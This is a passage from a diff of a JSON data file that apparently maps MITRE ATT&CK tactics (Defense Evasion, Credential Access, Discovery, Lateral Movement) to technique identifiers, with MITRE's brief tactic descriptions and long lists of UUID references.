"88c2fb46-877a-4005-8425-7639d0da1920", + "type": "uses" + }, + { + "dest-uuid": "e3be3d76-0a36-4060-8003-3b39c557f728", + "type": "uses" + }, + { + "dest-uuid": "8e332106-dd58-4adc-927d-57d038af797c", + "type": "uses" + }, + { + "dest-uuid": "a0adacc1-8d2a-4e0b-92c1-3766264df4fd", + "type": "uses" + }, + { + "dest-uuid": "64fd8f4d-5725-46c8-a37a-020a706db1e4", + "type": "uses" + }, + { + "dest-uuid": "7a6208ac-c75e-4e73-8969-0aaf6085cb6e", + "type": "uses" + }, + { + "dest-uuid": "c2cf211a-9676-4922-a386-69697ab4934a", + "type": "uses" + }, + { + "dest-uuid": "4060ad55-7ff1-4127-acad-808b2bc77655", + "type": "uses" + }, + { + "dest-uuid": "e8866e77-f0ca-4a19-b83e-d33dbafaf21b", + "type": "uses" + }, + { + "dest-uuid": "ef85800b-080d-4739-9f3b-91b61314a93e", + "type": "uses" + }, + { + "dest-uuid": "0ca01a9e-571e-4b17-a84d-23e9ce39b073", + "type": "uses" + }, + { + "dest-uuid": "581c5073-4236-4c45-b8fc-37ae2dfbb65f", + "type": "uses" + }, + { + "dest-uuid": "97918962-6509-4369-b2b5-5d02681c6700", + "type": "uses" + }, + { + "dest-uuid": "b5cc9ab3-6501-4c50-904e-1a25a4088125", + "type": "uses" + }, + { + "dest-uuid": "06f738c0-fbab-4d14-83ad-56240c8f35ac", + "type": "uses" + }, + { + "dest-uuid": "28f65214-95c1-4a72-b385-0b32cbcaea8f", + "type": "uses" + }, + { + "dest-uuid": "4f7d0afb-92ce-429b-9ef5-dc6a7fc4f4a8", + "type": "uses" + }, + { + "dest-uuid": "62e5e1c5-4fee-4f05-9dd4-a6dc306a46b1", + "type": "uses" + }, + { + "dest-uuid": "b0a1ef13-0c54-47e8-a220-7543ba41a327", + "type": "uses" + }, + { + "dest-uuid": "c5eb5b88-6c62-4900-9b14-c4d67d420002", + "type": "uses" + }, + { + "dest-uuid": "c26e1b28-89c9-4083-9f94-022c891bf60c", + "type": "uses" + }, + { + "dest-uuid": "2618638c-f6bd-4840-a297-c45076e094a9", + "type": "uses" + }, + { + "dest-uuid": "0dfeab84-3c42-4b56-9021-70fe5be4092b", + "type": "uses" + }, + { + "dest-uuid": "0df21d65-c885-415a-8f91-477ae1b37839", + "type": "uses" + }, + { + "dest-uuid": "edf9f7d7-bc14-4e25-800d-f508acb580d4", + "type": "uses" + }, + { + "dest-uuid": "8352a63b-7450-4946-93c9-b7434935d794", + "type": "uses" + }, + { + "dest-uuid": "7c9035b8-ad4b-4441-be2b-823d86b54fac", + "type": "uses" + }, + { + "dest-uuid": "6c55cf9c-0259-4ba0-9574-e90f6c88e6fd", + "type": "uses" + }, + { + "dest-uuid": "b0d884c3-cf87-4610-992d-4ec54c667759", + "type": "uses" + }, + { + "dest-uuid": "fc34e661-55c3-47be-a368-c2f5776cdd17", + "type": "uses" + }, + { + "dest-uuid": "cb2e4822-2529-4216-b5b8-75158c5f85ff", + "type": "uses" + }, + { + "dest-uuid": "ac7d9875-d18b-48f6-93e6-47c565f9526b", + "type": "uses" + }, + { + "dest-uuid": "ef0e0599-6543-499d-8409-ef449da5c38a", + "type": "uses" + }, + { + "dest-uuid": "e939bc27-a2cc-4278-be9b-a794c34aacbc", + "type": "uses" + }, + { + "dest-uuid": "ba8d0fed-e500-4060-9d31-277b7e4411fb", + "type": "uses" + }, + { + "dest-uuid": "5b841b56-6b47-4cec-bf80-71a9a51fa7a0", + "type": "uses" + }, + { + "dest-uuid": "d7c90fc2-b7df-4e83-96af-9cf1c428ffa3", + "type": "uses" + }, + { + "dest-uuid": "1f6a471d-49c6-4150-b213-2422d5fd3f26", + "type": "uses" + }, + { + "dest-uuid": "154dccf2-21fa-4aee-99cc-d959d841f8b1", + "type": "uses" + }, + { + "dest-uuid": "ccb72576-4e85-4c7b-89b8-fa67cc6cdbef", + "type": "uses" + }, + { + "dest-uuid": "495604b5-f74f-4224-9c3c-f8aacf8aef51", + "type": "uses" + }, + { + "dest-uuid": "764041d4-ff10-45d0-b42e-2f23ca334740", + "type": "uses" + }, + { + "dest-uuid": "fa1507f1-c763-4af1-8bd9-a2fb8f7904be", + "type": "uses" + }, + { + "dest-uuid": "5e771f38-6286-4330-b7b4-38071ad6b68a", + "type": "uses" + }, + { + "dest-uuid": "86c2f355-3c97-44c1-9a83-e3d016f50535", + "type": "uses" + }, + { + "dest-uuid": "abccbb2a-2ea8-43b8-95dc-c583df300c07", + "type": "uses" + }, + { + "dest-uuid": "ee177ad0-d282-42c0-91f9-7bcf724e3d31", + "type": "uses" + }, + { + "dest-uuid": "7ee64e42-6d3b-47f8-a2a9-55263537bd51", + "type": "uses" + }, + { + "dest-uuid": "f413afa2-406d-4e8e-a12c-5f1b8ef05d8a", + "type": "uses" + }, + { + "dest-uuid": "33cd26b0-0248-4ee2-97a6-aab6a79824af", + "type": "uses" + }, + { + "dest-uuid": "49749e13-48ed-49fc-82d1-13ae13b457c1", + "type": "uses" + }, + { + "dest-uuid": "2afcdcd1-ce55-4837-a84d-8279bc10f948", + "type": "uses" + }, + { + "dest-uuid": "e8eb0242-9972-4c8b-af89-7731065d79f8", + "type": "uses" + }, + { + "dest-uuid": "257fffe4-d17b-4e63-a41c-8388936d6215", + "type": "uses" + }, + { + "dest-uuid": "63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8", + "type": "uses" + }, + { + "dest-uuid": "d54c50df-3cb8-4fff-86c4-ae5be57937ad", + "type": "uses" + }, + { + "dest-uuid": "aca9cbac-5c11-4050-8d9c-2a947c89a1e8", + "type": "uses" + }, + { + "dest-uuid": "ab823cbf-0238-4347-a191-a90d84b978f7", + "type": "uses" + }, + { + "dest-uuid": "34a112db-c61d-4ea2-872f-de3fc1af87a3", + "type": "uses" + }, + { + "dest-uuid": "487916b2-99f6-40cd-8529-5a81d2f199db", + "type": "uses" + }, + { + "dest-uuid": "561da0ae-4ebc-4356-a954-338249cac31a", + "type": "uses" + }, + { + "dest-uuid": "fe8b3b28-41ad-405b-a2b8-9c10048550c2", + "type": "uses" + }, + { + "dest-uuid": "cb268bcf-3c2f-4583-94e3-7c9f0893e52f", + "type": "uses" + }, + { + "dest-uuid": "449abc18-9faf-4ea6-a420-34528c28301d", + "type": "uses" + }, + { + "dest-uuid": "f060dcca-e7d2-4711-b5d1-41cffcb731b0", + "type": "uses" + }, + { + "dest-uuid": "bd569ff9-c038-48c0-83d0-f5c784b439bc", + "type": "uses" + }, + { + "dest-uuid": "68ffdbed-08d8-46a2-a833-984bbf0d9b4a", + "type": "uses" + }, + { + "dest-uuid": "b9d60848-388e-444c-9f22-2267ea61b5e9", + "type": "uses" + }, + { + "dest-uuid": "b5c7edc6-0cc7-4c57-b39f-3b0474433889", + "type": "uses" + }, + { + "dest-uuid": "8325f2fd-35a3-4c0c-895d-7c82dd4ba2fb", + "type": "uses" + }, + { + "dest-uuid": "9f290216-b2ab-47b5-b9ae-a94ae6d357c6", + "type": "uses" + }, + { + "dest-uuid": "f435a5ff-78d2-44de-b464-2b5528f94adc", + "type": "uses" + }, + { + "dest-uuid": "1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68", + "type": "uses" + }, + { + "dest-uuid": "2507fbbc-ea9e-4e18-9329-b728847d7462", + "type": "uses" + }, + { + "dest-uuid": "a9b7eb2f-63e7-41bc-9d77-f7c4cede5406", + "type": "uses" + }, + { + "dest-uuid": "77100337-67a1-4520-b25a-3ddd72b0d5ac", + "type": "uses" + }, + { + "dest-uuid": "644d820e-6f64-4404-a861-cfa8b18b42a6", + "type": "uses" + }, + { + "dest-uuid": "046cc07e-8700-4536-9c5b-6ecb384f52b0", + "type": "uses" + }, + { + "dest-uuid": "60498bb5-fcfb-4d85-bf3e-26c30c08fbda", + "type": "uses" + }, + { + "dest-uuid": "aa5a31d0-1b78-481d-a317-5089c1e111bf", + "type": "uses" + }, + { + "dest-uuid": "7564b45e-55d9-4ffa-8e08-b08b0aa82182", + "type": "uses" + }, + { + "dest-uuid": "dcb323f0-0fe6-4e26-9039-4f26f10cd3a5", + "type": "uses" + }, + { + "dest-uuid": "091282d8-ef05-487f-93aa-445efaeed71b", + "type": "uses" + }, + { + "dest-uuid": "73a8b954-93fe-466c-b73d-bd35bb08c3e7", + "type": "uses" + }, + { + "dest-uuid": "fd6b86c5-535b-4532-a6d8-a57a6fb04c18", + "type": "uses" + }, + { + "dest-uuid": "b1da2b02-9ade-45e0-a795-ec1b19e5316a", + "type": "uses" + }, + { + "dest-uuid": "14fa2a80-c838-462d-8c34-5a98a31a65ca", + "type": "uses" + }, + { + "dest-uuid": "08188de6-22c8-42af-b01c-f1c250c22514", + "type": "uses" + }, + { + "dest-uuid": "f22d0738-dcb7-40c2-99cf-b426ac54224a", + "type": "uses" + }, + { + "dest-uuid": "d36a5323-e249-44e8-9c8b-5cc9c023a5e1", + "type": "uses" + }, + { + "dest-uuid": "74b99029-3f0a-4cc8-90d6-5a6b177c06eb", + "type": "uses" + }, + { + "dest-uuid": "a54c7c35-b70d-42b2-aa9d-5ffd9f792fff", + "type": "uses" + }, + { + "dest-uuid": "3a956db0-a3f0-442a-a981-db2ee20d60b2", + "type": "uses" + }, + { + "dest-uuid": "bd52a415-2b7a-4048-84bf-b20f385b357e", + "type": "uses" + }, + { + "dest-uuid": "1e3d9e0a-6744-44e4-836d-1db38a4cc99c", + "type": "uses" + }, + { + "dest-uuid": "6b278e5d-7383-42a4-9425-2da79bbe43e0", + "type": "uses" + }, + { + "dest-uuid": "4aa6466a-f7ca-4dae-b272-73ca23f0df8f", + "type": "uses" + }, + { + "dest-uuid": "6824cdb3-a4c5-45a8-a3d5-5a5afd347214", + "type": "uses" + }, + { + "dest-uuid": "5e8b76ce-b75f-449c-9d8f-573b1ffdb2bd", + "type": "uses" + }, + { + "dest-uuid": "2ba8a662-6930-4cbe-9e3d-4cbe2109fd88", + "type": "uses" + }, + { + "dest-uuid": "7360117a-3404-48d0-9d4b-7f6a61c08f0e", + "type": "uses" + }, + { + "dest-uuid": "630a17c1-0176-4764-8f5c-a83f4f3e980f", + "type": "uses" + }, + { + "dest-uuid": "e6dac24d-672c-4cae-82e7-2bf21014633c", + "type": "uses" + }, + { + "dest-uuid": "82d15799-9776-463e-9b87-a58d682cee55", + "type": "uses" + }, + { + "dest-uuid": "f216978a-36c0-47f1-a4ad-5ef67c8ae72c", + "type": "uses" + }, + { + "dest-uuid": "9dc21246-3788-48d6-b6a1-f2a39ee38557", + "type": "uses" + }, + { + "dest-uuid": "d36695d0-e4ab-4b8a-9c65-bab3cc34ef2c", + "type": "uses" + }, + { + "dest-uuid": "02b8e7c1-0db7-43f5-a5bc-531b30395122", + "type": "uses" + }, + { + "dest-uuid": "1423e8c1-7cbf-4cfb-a70d-b6fe8e1a8041", + "type": "uses" + }, + { + "dest-uuid": "9ed5db23-3b2a-4a08-8602-bc8dff5c80f0", + "type": "uses" + }, + { + "dest-uuid": "9e6268a5-a979-4219-b0ad-76094a9876c7", + "type": "uses" + }, + { + "dest-uuid": "24e0b530-cca7-4c5c-83b2-97b83c716e42", + "type": "uses" + }, + { + "dest-uuid": "945c1564-6c13-4baa-b1d4-6ba82e06a897", + "type": "uses" + }, + { + "dest-uuid": "50dd9303-b6a5-417a-860e-26f4244ff580", + "type": "uses" + }, + { + "dest-uuid": "33486e3e-1104-42d0-8053-34c8c9c4d10f", + "type": "uses" + }, + { + "dest-uuid": "7851bfe7-f149-47f5-9970-66d7cc4fdbe6", + "type": "uses" + }, + { + "dest-uuid": "e200d4c9-2d9c-4303-a2de-86baae85c60f", + "type": "uses" + }, + { + "dest-uuid": "9ef0ef16-b62c-4d09-b872-12c7e6adf2ed", + "type": "uses" + }, + { + "dest-uuid": "c262a10e-13db-4c47-995c-87201cdf858d", + "type": "uses" + }, + { + "dest-uuid": "d092a9e1-63d0-415d-8cd0-666a261be5d9", + "type": "uses" + }, + { + "dest-uuid": "4eb755e6-41f1-4c92-b14d-87a61a446258", + "type": "uses" + }, + { + "dest-uuid": "14e81a2d-9eca-429c-9fb9-08e109de9f6c", + "type": "uses" + }, + { + "dest-uuid": "bcaf63dc-660a-40d4-ba28-fc113b34bf51", + "type": "uses" + }, + { + "dest-uuid": "8592f37d-850a-43d1-86f2-cc981ad7d7dc", + "type": "uses" + }, + { + "dest-uuid": "3c4a2f3a-5877-4a27-a417-76318523657e", + "type": "uses" + }, + { + "dest-uuid": "ac10844f-e4ab-44a2-97b4-3d74a1fc046c", + "type": "uses" + }, + { + "dest-uuid": "3b12e647-2bbd-4d84-9abe-401ad4230b6d", + "type": "uses" + }, + { + "dest-uuid": "232bb95b-a267-4cc2-8eb1-67ecdd5babd5", + "type": "uses" + }, + { + "dest-uuid": "f516ecd7-a6a6-4018-8e58-c007be05bdce", + "type": "uses" + }, + { + "dest-uuid": "e0d1825e-e46a-48f2-9b28-8346a39d39b0", + "type": "uses" + }, + { + "dest-uuid": "195aa08b-15fd-4019-b905-8f31bc5e2094", + "type": "uses" + }, + { + "dest-uuid": "6c8fa277-33c3-45b5-8f0d-9b1c0ccaf284", + "type": "uses" + }, + { + "dest-uuid": "49e3504a-e031-45a0-b816-1d3741a78c7f", + "type": "uses" + }, + { + "dest-uuid": "d2a19fd8-ff9c-4f9e-9e84-ed3ea12c4b7c", + "type": "uses" + }, + { + "dest-uuid": "15b65bf2-dbe5-47bc-be09-ed97684bf391", + "type": "uses" + }, + { + "dest-uuid": "8811114c-a0cf-479c-b95d-c036467749e3", + "type": "uses" + }, + { + "dest-uuid": "43c2f853-cb52-4242-94e9-ec53743f3c05", + "type": "uses" + }, + { + "dest-uuid": "f5732b2d-0548-4574-bcc8-59ceef24aeeb", + "type": "uses" + }, + { + "dest-uuid": "110c385f-9f27-4fd6-837c-6261294073ab", + "type": "uses" + }, + { + "dest-uuid": "c41cb2d3-ff4c-5ee7-99b9-8a3d7987c9bf", + "type": "uses" + }, + { + "dest-uuid": "f91a7433-d5f1-5a47-8252-f02b513ce7f4", + "type": "uses" + }, + { + "dest-uuid": "f1329084-6e9c-5933-83cd-56c1bf8439e3", + "type": "uses" + }, + { + "dest-uuid": "67fa2827-fd64-5bf7-bf77-27b6ffc8f77f", + "type": "uses" + }, + { + "dest-uuid": "d8406198-626c-5659-945e-2b5105fcd0c9", + "type": "uses" + }, + { + "dest-uuid": "ed511983-98ef-572f-b5fc-0687f48467e0", + "type": "uses" + }, + { + "dest-uuid": "9e55bc80-a187-58f7-a687-d37bbd618db7", + "type": "uses" + }, + { + "dest-uuid": "d9eb2887-840e-5ed7-bb4b-3b210f4147f9", + "type": "uses" + }, + { + "dest-uuid": "448dc009-2d3f-5480-aba3-0d80dc4336cd", + "type": "uses" + }, + { + "dest-uuid": "e2911337-76ed-5834-b621-bb2b9a4205ee", + "type": "uses" + }, + { + "dest-uuid": "20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1", + "type": "uses" + }, + { + "dest-uuid": "04e8e75c-434e-51e0-9780-580a3823a8cb", + "type": "uses" + } + ], + "uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "value": "Defense Evasion" + }, + { + "description": "The adversary is trying to steal account names and passwords.\n\nCredential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.", + "meta": { + "ordinal_position": 8, + "source": "MITRE", + "tactic_attack_id": "TA0006", + "tags": [] + }, + "related": [ + { + "dest-uuid": "d98dbf30-c454-42ff-a9f3-2cd3319cc0d9", + "type": "uses" + }, + { + "dest-uuid": "852748c2-280b-41e8-ba87-d97ec9fade70", + "type": "uses" + }, + { + "dest-uuid": "7f1798b5-b159-441b-a5ef-3b5c706e1699", + "type": "uses" + }, + { + "dest-uuid": "e849ebcc-e0af-45a5-aefa-c394bb759b4e", + "type": "uses" + }, + { + "dest-uuid": "368f85f9-2b15-4732-80fe-087694eaf34d", + "type": "uses" + }, + { + "dest-uuid": "17f9e46d-4e3d-4491-a0d9-0cc042531d6e", + "type": "uses" + }, + { + "dest-uuid": "a95e33ab-7032-4943-ab15-d526420e0cc6", + "type": "uses" + }, + { + "dest-uuid": "a5a95893-d837-424a-979f-095a47dd9f34", + "type": "uses" + }, + { + "dest-uuid": "fd75ec36-fc88-4bee-9fd9-480df6d1e765", + "type": "uses" + }, + { + "dest-uuid": "7e8c3c70-2e9f-4fa0-b083-ff5610447dc1", + "type": "uses" + }, + { + "dest-uuid": "1ef8a053-ff13-4a10-b9d9-0a017880e4a5", + "type": "uses" + }, + { + "dest-uuid": "b40aa9fa-abb5-47c3-951f-2d454b9bc017", + "type": "uses" + }, + { + "dest-uuid": "dc0aecef-3cb2-4381-b6e4-dfa7be16d42b", + "type": "uses" + }, + { + "dest-uuid": "81ae71ff-ca5e-4b87-9361-24ebc2c454b3", + "type": "uses" + }, + { + "dest-uuid": "9448cf6f-7ba3-41d1-8710-8e6f9b0572ee", + "type": "uses" + }, + { + "dest-uuid": "bbad213d-477d-43bf-9501-ad7d74bac323", + "type": "uses" + }, + { + "dest-uuid": "cdac2469-52ca-42a8-aefe-0321a7e3d658", + "type": "uses" + }, + { + "dest-uuid": "cd65b0f4-a2a4-4291-aff2-1c65cf68cf6c", + "type": "uses" + }, + { + "dest-uuid": "888e603b-ca97-4671-aa43-a25248fc9fc8", + "type": "uses" + }, + { + "dest-uuid": "0fef0394-7cf6-4797-8a5e-1cbfd31ee501", + "type": "uses" + }, + { + "dest-uuid": "a0bb264e-8617-4ae6-bafd-f52b36c63d12", + "type": "uses" + }, + { + "dest-uuid": "02ed857b-ba39-4fab-b1d9-3ed2aa689dfd", + "type": "uses" + }, + { + "dest-uuid": "b0a1ef13-0c54-47e8-a220-7543ba41a327", + "type": "uses" + }, + { + "dest-uuid": "b4a1cbaa-85d1-4a65-977f-494f66a141e3", + "type": "uses" + }, + { + "dest-uuid": "52dabfcc-b7a4-4334-9014-ab9d82f5527b", + "type": "uses" + }, + { + "dest-uuid": "e493bf4a-0eba-4e60-a7a6-c699084dc98a", + "type": "uses" + }, + { + "dest-uuid": "b44a263f-76b2-4a1f-baeb-dd285974eca6", + "type": "uses" + }, + { + "dest-uuid": "ab0da102-5a14-42b1-969e-5d3daefdf0c5", + "type": "uses" + }, + { + "dest-uuid": "e63414a7-c6f7-4bcf-a6eb-25b0c4ddbb2a", + "type": "uses" + }, + { + "dest-uuid": "34674b83-86a7-4ad9-8b05-49b505aa5ef0", + "type": "uses" + }, + { + "dest-uuid": "cf4d8bb4-2d60-499d-b72c-4957660758c9", + "type": "uses" + }, + { + "dest-uuid": "12efebf8-9da4-446c-a627-b6f95524f1ea", + "type": "uses" + }, + { + "dest-uuid": "b8c27b52-3e73-448d-8a7c-3e814c8e3889", + "type": "uses" + }, + { + "dest-uuid": "065d1cca-8ca5-4f8b-a333-2340706f589e", + "type": "uses" + }, + { + "dest-uuid": "838c5038-91e7-4648-925e-a142c8c10853", + "type": "uses" + }, + { + "dest-uuid": "b0966c0f-1e09-4d5d-acff-0ca79dc9da89", + "type": "uses" + }, + { + "dest-uuid": "f78f2c87-626a-468f-93a5-31b61be17727", + "type": "uses" + }, + { + "dest-uuid": "57dd1624-42e9-42a6-b1bb-d1d1df233138", + "type": "uses" + }, + { + "dest-uuid": "d8507187-cea6-4be2-95b4-e875924e58c0", + "type": "uses" + }, + { + "dest-uuid": "c0f2efd4-bfc8-43da-9859-14446fb8f289", + "type": "uses" + }, + { + "dest-uuid": "afdfa503-0464-4b42-a79c-a6fc828492ef", + "type": "uses" + }, + { + "dest-uuid": "40ac9bae-173e-467c-80f2-0c1513fc874d", + "type": "uses" + }, + { + "dest-uuid": "c16eef78-232e-47a2-98e9-046ec075b13c", + "type": "uses" + }, + { + "dest-uuid": "6d300882-d404-4f77-a19d-4a2f2b786702", + "type": "uses" + }, + { + "dest-uuid": "60498bb5-fcfb-4d85-bf3e-26c30c08fbda", + "type": "uses" + }, + { + "dest-uuid": "e732e1d4-fffa-4fc3-b387-47782c821688", + "type": "uses" + }, + { + "dest-uuid": "5ee96331-a7b7-4c32-a8f1-3fb164078f5f", + "type": "uses" + }, + { + "dest-uuid": "03ef726b-ac65-4e23-8130-9d299a3f458a", + "type": "uses" + }, + { + "dest-uuid": "ef7732d9-b629-4037-b5b5-579dafda080b", + "type": "uses" + }, + { + "dest-uuid": "e7135af8-3668-4d94-90d2-2a93a6b5c327", + "type": "uses" + }, + { + "dest-uuid": "9503955c-fa53-452a-b717-7e23bfb4df83", + "type": "uses" + }, + { + "dest-uuid": "82d15799-9776-463e-9b87-a58d682cee55", + "type": "uses" + }, + { + "dest-uuid": "9dc21246-3788-48d6-b6a1-f2a39ee38557", + "type": "uses" + }, + { + "dest-uuid": "600d45ec-cb9c-47b8-ae94-326471ebb007", + "type": "uses" + }, + { + "dest-uuid": "c46432d4-bdeb-4dad-bbbd-68ad8ba6aca5", + "type": "uses" + }, + { + "dest-uuid": "2f980aed-b34a-4300-ac6b-70e7ddf6d9be", + "type": "uses" + }, + { + "dest-uuid": "0a54e0f9-27eb-466b-ae47-53216e6e8065", + "type": "uses" + }, + { + "dest-uuid": "f516ecd7-a6a6-4018-8e58-c007be05bdce", + "type": "uses" + }, + { + "dest-uuid": "28fd13d1-b555-47fa-9d47-caf6b1367ace", + "type": "uses" + }, + { + "dest-uuid": "6f6b88df-039c-4b69-87e0-97dfabbb49d8", + "type": "uses" + }, + { + "dest-uuid": "195aa08b-15fd-4019-b905-8f31bc5e2094", + "type": "uses" + }, + { + "dest-uuid": "f1329084-6e9c-5933-83cd-56c1bf8439e3", + "type": "uses" + }, + { + "dest-uuid": "8e9cfd62-1a61-50dc-8f05-8a4914fd3853", + "type": "uses" + }, + { + "dest-uuid": "260571a6-3c08-5419-98c5-3fa1aa8e675d", + "type": "uses" + } + ], + "uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "value": "Credential Access" + }, + { + "description": "The adversary is trying to figure out your environment.\n\nDiscovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective. ", + "meta": { + "ordinal_position": 9, + "source": "MITRE", + "tactic_attack_id": "TA0007", + "tags": [] + }, + "related": [ + { + "dest-uuid": "86e6f1f0-290b-4971-b50e-80e98a0a768b", + "type": "uses" + }, + { + "dest-uuid": "41c4b4cc-99da-4323-b0f4-229906578501", + "type": "uses" + }, + { + "dest-uuid": "3f926f8f-7b47-4a7d-976a-269704a6bc5c", + "type": "uses" + }, + { + "dest-uuid": "f9d61206-3063-4d04-b06f-225f4766bff1", + "type": "uses" + }, + { + "dest-uuid": "9e366f99-7f7d-4407-8915-448a8108c7e0", + "type": "uses" + }, + { + "dest-uuid": "d97d754d-92d5-4874-bbfe-5aa4d581f2a8", + "type": "uses" + }, + { + "dest-uuid": "12908bde-a5eb-40a5-ae27-d93960d0bfdc", + "type": "uses" + }, + { + "dest-uuid": "df5f6835-ca0a-4ef5-bb3a-b011e4025545", + "type": "uses" + }, + { + "dest-uuid": "026c9281-07f1-4358-96d3-151fed76b1fe", + "type": "uses" + }, + { + "dest-uuid": "f14bb7ae-6ba3-4b44-b776-c79867ea9225", + "type": "uses" + }, + { + "dest-uuid": "e0a347e2-2ac5-458b-ab0f-18d81b6d6055", + "type": "uses" + }, + { + "dest-uuid": "bbad213d-477d-43bf-9501-ad7d74bac323", + "type": "uses" + }, + { + "dest-uuid": "ac5e465f-466d-41e4-933a-04e2c861e820", + "type": "uses" + }, + { + "dest-uuid": "0997d871-875e-41e4-891c-f8a4ed8b2f31", + "type": "uses" + }, + { + "dest-uuid": "a2961a00-450e-45a5-b293-f699d9f3b4ea", + "type": "uses" + }, + { + "dest-uuid": "3b2f435a-8666-43b5-9883-f2808eebd726", + "type": "uses" + }, + { + "dest-uuid": "b31b014b-0b59-4493-966b-a57ad68f073d", + "type": "uses" + }, + { + "dest-uuid": "0ca01a9e-571e-4b17-a84d-23e9ce39b073", + "type": "uses" + }, + { + "dest-uuid": "fd346e4e-b22f-4cae-bc24-946d7b14b5e1", + "type": "uses" + }, + { + "dest-uuid": "f1af5c8b-3210-4788-a873-97b1518bb43a", + "type": "uses" + }, + { + "dest-uuid": "adb6b8c1-2bdb-42b9-95da-5ce07e8796f7", + "type": "uses" + }, + { + "dest-uuid": "6736995e-b9ea-401b-81fa-6caeb7a17ce3", + "type": "uses" + }, + { + "dest-uuid": "93bd112e-9494-4b60-bdc5-8b610c7ebe21", + "type": "uses" + }, + { + "dest-uuid": "1492c4ba-c933-47b8-953d-6de3db8cfce8", + "type": "uses" + }, + { + "dest-uuid": "0d258912-58b1-4982-b90f-eed576f05ffc", + "type": "uses" + }, + { + "dest-uuid": "63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8", + "type": "uses" + }, + { + "dest-uuid": "92761d92-a288-4407-a112-bb2720f07d07", + "type": "uses" + }, + { + "dest-uuid": "d76c3dde-dba5-4748-8d51-c93fc34f885e", + "type": "uses" + }, + { + "dest-uuid": "710ae610-0556-44e5-9de9-8be6159a23dd", + "type": "uses" + }, + { + "dest-uuid": "cb268bcf-3c2f-4583-94e3-7c9f0893e52f", + "type": "uses" + }, + { + "dest-uuid": "0fa8230a-fd97-4e2c-9923-923044af4291", + "type": "uses" + }, + { + "dest-uuid": "2bf2e498-99c8-4e36-ad4b-e675d95ac925", + "type": "uses" + }, + { + "dest-uuid": "7bebc801-5d5d-44b0-8da2-f37f7d88e40d", + "type": "uses" + }, + { + "dest-uuid": "58722f84-b119-45a8-8e29-0065688015ee", + "type": "uses" + }, + { + "dest-uuid": "90e6a093-3e87-4d74-8b68-38c7d7e5e93c", + "type": "uses" + }, + { + "dest-uuid": "9e945aa5-3883-4537-a767-f49bdcce26c7", + "type": "uses" + }, + { + "dest-uuid": "5d0a3722-52b6-4968-a367-7ca6bc9a33fc", + "type": "uses" + }, + { + "dest-uuid": "00a9a4d4-928d-4d95-be31-dfac6103991f", + "type": "uses" + }, + { + "dest-uuid": "5bab1234-8d1e-437f-88a0-d527b2dfc6cd", + "type": "uses" + }, + { + "dest-uuid": "e9bff6ff-3142-4910-8f67-19b868912602", + "type": "uses" + }, + { + "dest-uuid": "315ce434-ad6d-4dae-a1dd-6db944a44422", + "type": "uses" + }, + { + "dest-uuid": "945c1564-6c13-4baa-b1d4-6ba82e06a897", + "type": "uses" + }, + { + "dest-uuid": "2e634ff1-a4ea-41b4-8ee9-23db4627a986", + "type": "uses" + }, + { + "dest-uuid": "70ffc700-eb9b-54d7-8fd4-564bd71a6434", + "type": "uses" + }, + { + "dest-uuid": "4c7c0caa-b9bc-5d63-b5c3-812fdf3bba8a", + "type": "uses" + }, + { + "dest-uuid": "309c7c8b-c366-5762-8611-136971ac4eb4", + "type": "uses" + } + ], + "uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "value": "Discovery" + }, + { + "description": "The adversary is trying to move through your environment.\n\nLateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier. ", + "meta": { + "ordinal_position": 10, + "source": "MITRE", + "tactic_attack_id": "TA0008", + "tags": [] + }, + "related": [ + { + "dest-uuid": "af7afc1e-3374-4d1c-917b-c47c305274f5", + "type": "uses" + }, + { + "dest-uuid": "58987d0d-2ebf-4783-90ac-5164fe9b9e43", + "type": "uses" + }, + { + "dest-uuid": "7620ba3a-7877-4f87-90e3-588163ac0474", + "type": "uses" + }, + { + "dest-uuid": "6a7ab25e-49ed-4cd3-b199-5d80b728b416", + "type": "uses" + }, + { + "dest-uuid": "45f2613d-35dd-4ddc-a222-30e9c0dd6bf6", + "type": "uses" + }, + { + "dest-uuid": "bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd", + "type": "uses" + }, + { + "dest-uuid": "28f65214-95c1-4a72-b385-0b32cbcaea8f", + "type": "uses" + }, + { + "dest-uuid": "30ef3f13-5e9b-4712-9adf-f0da4ef157a1", + "type": "uses" + }, + { + "dest-uuid": "c992f340-645d-412a-b509-3cbaf94919b0", + "type": "uses" + }, + { + "dest-uuid": "c2866fd3-754e-4b40-897a-e73a8c1fcf7b", + "type": "uses" + }, + { + "dest-uuid": "ebc5fabb-5634-49f2-8979-94ea98da114a", + "type": "uses" + }, + { + "dest-uuid": "5e771f38-6286-4330-b7b4-38071ad6b68a", + "type": "uses" + }, + { + "dest-uuid": "1bcf9fb5-6848-44d9-b394-ffbd3c357058", + "type": "uses" + }, + { + "dest-uuid": "51ff4ada-8a71-4801-9cb8-a6e216eaa4e4", + "type": "uses" + }, + { + "dest-uuid": "4f4ea659-7653-4bfd-a525-b2af32c5899b", + "type": "uses" + }, + { + "dest-uuid": "3dea57fc-3131-408b-a1fd-ff2eea1d858f", + "type": "uses" + }, + { + "dest-uuid": "d36a5323-e249-44e8-9c8b-5cc9c023a5e1", + "type": "uses" + }, + { + "dest-uuid": "a0f4b31b-41b7-4602-914a-f46aa815aadb", + "type": "uses" + }, + { + "dest-uuid": "33486e3e-1104-42d0-8053-34c8c9c4d10f", + "type": "uses" + }, + { + "dest-uuid": "f5fb86b6-abf0-4d44-b4a0-56f0636c24d2", + "type": "uses" + }, + { + "dest-uuid": "8592f37d-850a-43d1-86f2-cc981ad7d7dc", + "type": "uses" + }, + { + "dest-uuid": 